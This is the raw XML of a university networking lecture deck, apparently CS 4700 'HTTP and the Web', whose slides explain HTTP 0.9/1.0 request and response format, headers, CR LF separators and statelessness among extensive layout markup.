            <a:fld id="{283B9EA5-CE9A-4950-A80C-5ADF06B45BB8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="203200" y="1600200"/>
            <a:ext cx="11785600" cy="5105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2286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3048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3048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3048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3" name="Slide Number Placeholder 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="457200"/>
            <a:ext cx="1727200" cy="701676"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1p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8128000" y="6248401"/>
            <a:ext cx="3556000" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Slide Number Placeholder 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{283B9EA5-CE9A-4950-A80C-5ADF06B45BB8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Footer Placeholder 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812801" y="6248207"/>
            <a:ext cx="7228111" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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8128000" y="6248401"/>
            <a:ext cx="3556000" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Slide Number Placeholder 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{283B9EA5-CE9A-4950-A80C-5ADF06B45BB8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Footer Placeholder 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812801" y="6248207"/>
            <a:ext cx="7228111" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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8128000" y="6248401"/>
            <a:ext cx="3556000" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812801" y="6248207"/>
            <a:ext cx="7228111"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248401"/>
            <a:ext cx="3556000" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812801" y="6248207"/>
            <a:ext cx="7228111"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a:xfrm>
            <a:off x="8128000" y="6248401"/>
            <a:ext cx="3556000" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812801" y="6248207"/>
            <a:ext cx="722811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a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>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283B9EA5-CE9A-4950-A80C-5ADF06B45BB8}"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a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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03200" y="228600"/>
            <a:ext cx="117856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203200" y="1600200"/>
            <a:ext cx="11785600" cy="51054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6179" y="1257917"/>
            <a:ext cx="793579" cy="260728"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr kumimoji="0" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{283B9EA5-CE9A-4950-A80C-5ADF06B45B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example.com/" TargetMode="External"/><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hyperlink" Target="http://www.images.com/"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www.websearch.com/search?q=Christo+Wilson" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.websearch.com/" TargetMode="Externa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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.friendly.com/" TargetMode="Externa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friendly.com/" TargetMode="Externa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bofw.com/" TargetMode="External"/><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hyperlink" Target="https://google.com/search?q=whatever"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int.cia.gov/projects/hitlist.html" TargetMode="Externa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43000"/>
            <a:ext cx="9452113" cy="1828800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" cap="none" dirty="0"/>
              <a:t>CS 4700</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="6000" cap="none" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4900" cap="none" dirty="0"/>
              <a:t>Network Fundamentals</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Subtitle 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209799" y="3496235"/>
            <a:ext cx="6662784" cy="2133600"/>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sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP and the Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Subtitle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Revised 3/11/2024</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3265509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0.9/1.0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hypertext Transfer Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client/server protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intended for downloading HTML documents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be generalized to download any kind of file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Original version was 0.9, closely followed by 1.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Text based protocol, typically over TCP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Request and response format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Request line / response line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Zero or more headers; each is a &lt;key: value&gt; pair</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Body that may contain data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File (GET)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User data (POST)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One request/response per TCP connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP 0.9/1.0 is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stateless</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1606606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Request Format</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Speech Bubble: Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72C278EC-3C40-DEBA-C789-811FBAA2A0CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3737080" y="1627937"/>
            <a:ext cx="2058537" cy="843721"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -19159"/>
              <a:gd name="adj2" fmla="val 90606"/>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t>Spaces used as separators</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81F0D17C-E34A-FF11-179A-22AF2F5A32CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-13253" y="2788913"/>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Method, resource, and version</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67C1F610-CB31-FF00-A302-029151DFD97C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-37682" y="3515467"/>
            <a:ext cx="2674860"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Headers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0565A000-06F7-10FB-1E94-D6533B2A47DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-37682" y="4621482"/>
            <a:ext cx="3484729" cy="3457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Entity Body</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{578F914E-5C4F-2E61-E825-2AD7798814F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3542751" y="2806863"/>
            <a:ext cx="2981736"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METHOD PATH HTTP_VERSION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6410C582-C234-3ABB-F3B7-B8121DA60058}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3542751" y="3101327"/>
            <a:ext cx="2314710"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HEADER_NAME: VALUE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Straight Connector 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C58284B1-CA24-C13E-D7D0-E8D2CCC289A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3480575" y="2488662"/>
            <a:ext cx="0" cy="2631094"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:prstDash val="sysDot"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent3"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent3"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent3"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3444719D-D9D0-6157-E05C-C79D5AA9CE5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3542751" y="3418121"/>
            <a:ext cx="2314710"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HEADER_NAME: VALUE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{124C8669-ABF4-19B0-3A78-5351F73DE9B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3542751" y="4027627"/>
            <a:ext cx="2314710"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HEADER_NAME: VALUE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1779A0A9-7C47-C7EA-7711-642848737C33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3542751" y="3680731"/>
            <a:ext cx="2314710"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t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CB52465-82B0-CE9B-0E99-694701BB6A5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3542751" y="4653343"/>
            <a:ext cx="3043580"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Arbitrary data goes here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Left Brace 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9226CCE-6619-C990-E695-1D664221E5F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="3139475"/>
            <a:ext cx="530086" cy="109993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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CB9D31E-0E08-8E02-1840-97E15FD31DFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6391041" y="2761856"/>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cr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rectangle 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5165BFDA-D348-47F5-7EBC-A5790D96EB0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6763355" y="2761856"/>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lf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Rectangle 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1023E43-573A-ED8C-E77D-F36A8615B91B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5732850" y="3069959"/>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cr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Rectangle 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E84442B-1AF5-EDB6-CF4C-23B11E47C522}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6105164" y="3069959"/>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lf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Rectangle 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DED99A82-1349-2E4D-9C1D-C32B29107027}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5729539" y="3387666"/>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cr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Rectangle 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DB89E55-F005-4505-5F32-0935CF28FC0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6101853" y="3387666"/>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lf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Rectangle 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED1E5A55-F363-62F3-F1AB-A4353FEADF84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5729539" y="3986535"/>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cr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Rectangle 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13F7B9A9-CA5A-5FDC-847A-B30B6F695604}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6101853" y="3986535"/>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lf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Rectangle 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4AE0607-1A65-7856-4FC3-CD8DF55D3336}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3615817" y="4318138"/>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cr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Rectangle 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F822AFB7-055A-2524-7E3C-51906C0BE3BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3988131" y="4318138"/>
            <a:ext cx="349897" cy="28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lf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
